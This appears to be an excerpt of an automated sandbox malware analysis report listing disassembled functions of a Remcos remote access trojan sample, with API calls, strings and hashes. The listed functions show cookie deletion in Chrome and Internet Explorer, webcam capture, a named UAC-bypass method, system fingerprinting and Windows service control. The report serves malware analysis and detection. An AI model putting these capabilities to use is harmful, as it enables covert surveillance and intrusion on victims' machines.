                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    • API String ID: 1133728706-4073444585
                                    • Opcode ID: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                    • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                    • Opcode Fuzzy Hash: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                    • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                    Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                    • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                    • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                    • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                    Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                    • _free.LIBCMT ref: 00450FC8
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 00450FD3
                                    • _free.LIBCMT ref: 00450FDE
                                    • _free.LIBCMT ref: 00451032
                                    • _free.LIBCMT ref: 0045103D
                                    • _free.LIBCMT ref: 00451048
                                    • _free.LIBCMT ref: 00451053
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                    Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                    • int.LIBCPMT ref: 004111BE
                                      • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                      • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                    • std::_Facet_Register.LIBCPMT ref: 004111FE
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                    • String ID: (mG
                                    • API String ID: 2536120697-4059303827
                                    • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                    • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                    • Opcode Fuzzy Hash: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                    • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                    Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                      • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                      • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                      • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                    • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue
                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    • API String ID: 1866151309-2070987746
                                    • Opcode ID: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                    • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                    • Opcode Fuzzy Hash: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                    • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                    Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                    • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                    • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                    • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                    • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                    Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\keHuNxIumw.exe), ref: 0040760B
                                      • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                      • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                    • CoUninitialize.OLE32 ref: 00407664
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InitializeObjectUninitialize_wcslen
                                    • String ID: C:\Users\user\AppData\Roaming\keHuNxIumw.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                    • API String ID: 3851391207-3528393351
                                    • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                    • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                    • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                    • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                    Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                    • GetLastError.KERNEL32 ref: 0040BB22
                                    Strings
                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                    • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                    • UserProfile, xrefs: 0040BAE8
                                    • [Chrome Cookies not found], xrefs: 0040BB3C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                    • API String ID: 2018770650-304995407
                                    • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                    • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                    • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                    • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                    Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                    • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Console$AllocOutputShowWindow
                                    • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                    • API String ID: 2425139147-2212855755
                                    • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                    • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                    • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                    • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                    Function 004433DA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                    • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$PkGNG$mscoree.dll
                                    • API String ID: 4061214504-213444651
                                    • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                    • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                    • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                    • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                    Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                    Download Yara Rule
                                    APIs
                                    • __allrem.LIBCMT ref: 0043ACE9
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                    • __allrem.LIBCMT ref: 0043AD1C
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                    • __allrem.LIBCMT ref: 0043AD51
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                    • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                    • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                    • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                    Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleep
                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                    • API String ID: 3469354165-3054508432
                                    • Opcode ID: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                    • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                    • Opcode Fuzzy Hash: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                    • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                    Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                    • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                    • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                      • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                      • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                      • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                    • String ID:
                                    • API String ID: 3950776272-0
                                    • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                    • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                    • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                    • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                    Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                    • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                    • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                    • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                    Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                    • String ID:
                                    • API String ID: 493672254-0
                                    • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                    • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                    Function 0044A084 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID: PkGNG
                                    • API String ID: 1036877536-263838557
                                    • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                    • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                    • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                    • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                    Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • _free.LIBCMT ref: 004482CC
                                    • _free.LIBCMT ref: 004482F4
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • _abort.LIBCMT ref: 00448313
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                    • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                    • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                    • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                    Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                    • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                    • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                    • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                    Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                    • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                    • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                    • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                    Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                    • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                    • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                    • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
